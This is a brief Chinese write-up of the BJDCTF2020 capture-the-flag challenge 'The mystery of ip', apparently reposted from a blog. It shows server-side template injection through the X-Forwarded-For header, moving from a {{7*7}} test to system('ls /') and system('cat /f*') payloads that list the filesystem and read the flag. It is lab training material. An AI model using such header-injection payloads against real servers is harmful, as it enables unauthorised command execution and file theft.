[BJDCTF2020]The mystery of ip 1

[BJDCTF2020]The mystery of ip 1

X-Forwarded-For:

用来表示 HTTP 请求端真实 IP

在X-Forwarded-For中输入:{ {7*7}}发现回显为49,说明存在框架漏洞,ssti模板注入。

发现可以直接执行下列命令:
X-Forwarded-For: { {system(‘ls /’)}},有明显
在这里插入图片描述
X-Forwarded-For:{ {system(‘cat /f*’)}}
直接回显出flag
总结:
这题是关于xff的一个ssti模板注入漏洞在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/m0_73728268/article/details/130308767
今日推荐